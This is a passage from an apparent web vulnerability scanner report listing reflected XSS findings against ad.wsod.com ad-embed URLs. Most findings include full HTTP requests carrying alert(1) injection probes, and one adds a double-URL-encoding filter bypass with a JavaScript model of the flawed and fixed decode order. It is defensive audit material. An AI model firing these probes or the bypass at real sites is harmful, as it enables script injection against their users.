This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:35 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683615:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

4.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec678'-alert(1)-'8c695f1ae57 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:26 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683606:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

4.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9848'-alert(1)-'5b0c6c829a2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:08 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683588:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       
...[SNIP]...

4.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 304f9'-alert(1)-'df9bcca7015 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:59 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683579:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

4.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68cc'-alert(1)-'ca9f21a572f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:54:20 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683660:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:54:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 851

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

4.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12676"-alert(1)-"e19a228f6fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683569**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacb0"-alert(1)-"739720fb74 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683597**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20962"-alert(1)-"2a1d1d242bf was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf">
...[SNIP]...

4.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96c1d"-alert(1)-"ac8d47e6ca4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296683606**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which the scanner identified as encapsulated in double quotation marks. The payload 81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa was submitted in REST URL parameter 2 and was echoed as 81851";alert(1)//aa8ae4a84fa in the application's response. The scanner reports this as a proof of concept for injecting arbitrary JavaScript into the response.

The echoed form shows that the application URL-decodes the path a second time after the web server's own decode: %2522 survives the first decode as %22 and only becomes a double quote on the second. The application attempts to block certain characters that are often used in XSS attacks, but because that check sees the once-decoded value it can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Context caveat: as in 4.49, the response excerpt shows the reflection inside a single-quoted JavaScript string that writes a <script src="..."> element, so the decoded double quote terminates the HTML src attribute rather than a JavaScript string literal. Verify the context manually before treating the ";alert(1)// probe as proof of script execution.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
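The following is an added example, not code from the ad.wsod.com page, modelling the decode ordering described above: a character filter that runs on the once-decoded path and is followed by a second URL-decode, beside the two correct orderings. The BLOCKED set and the function names are hypothetical; DOUBLE_ENCODED is the probe recorded above.

```javascript
// Added example (not ad.wsod.com code): filter-before-second-decode bypass
// with %2522, and the fixed orderings. Names and the filter are hypothetical.

const DOUBLE_ENCODED = '81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa';

// Characters the hypothetical filter refuses.
const BLOCKED = /["'<>;]/;

// The web server decodes the request path once before the application sees it.
function serverDecode(rawPath) {
  return decodeURIComponent(rawPath);
}

// Broken: validate the once-decoded value, then decode it again. %2522 passes
// the filter as %22 and only becomes a quote after the check has run.
function handleBroken(rawPath) {
  const once = serverDecode(rawPath);
  if (BLOCKED.test(once)) return { rejected: true, value: null };
  const twice = decodeURIComponent(once);
  return { rejected: false, value: twice };
}

// Fixed (preferred): no second decode at all. The server already produced the
// canonical value, and the filter sees exactly what will be used.
function handleFixed(rawPath) {
  const once = serverDecode(rawPath);
  if (BLOCKED.test(once)) return { rejected: true, value: null };
  return { rejected: false, value: once };
}

// Fixed (only if a second decode is genuinely required): canonicalise first,
// then validate the final form.
function handleFixedAfterCanonicalise(rawPath) {
  const canonical = decodeURIComponent(serverDecode(rawPath));
  if (BLOCKED.test(canonical)) return { rejected: true, value: null };
  return { rejected: false, value: canonical };
}

// Stand-alone demonstration: the broken handler lets 81851";alert(1)// through.
console.log('broken :', handleBroken(DOUBLE_ENCODED));
console.log('fixed  :', handleFixed(DOUBLE_ENCODED));
console.log('canon. :', handleFixedAfterCanonicalise(DOUBLE_ENCODED));
```

A quick check for the same class of bug on any parameter is to submit the single-encoded and double-encoded forms of one character and compare the echoes: if %2522 comes back as a literal quote, the application is decoding twice.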

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135781851%2522%253balert%25281%2529%252f%252faa8ae4a84fa/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
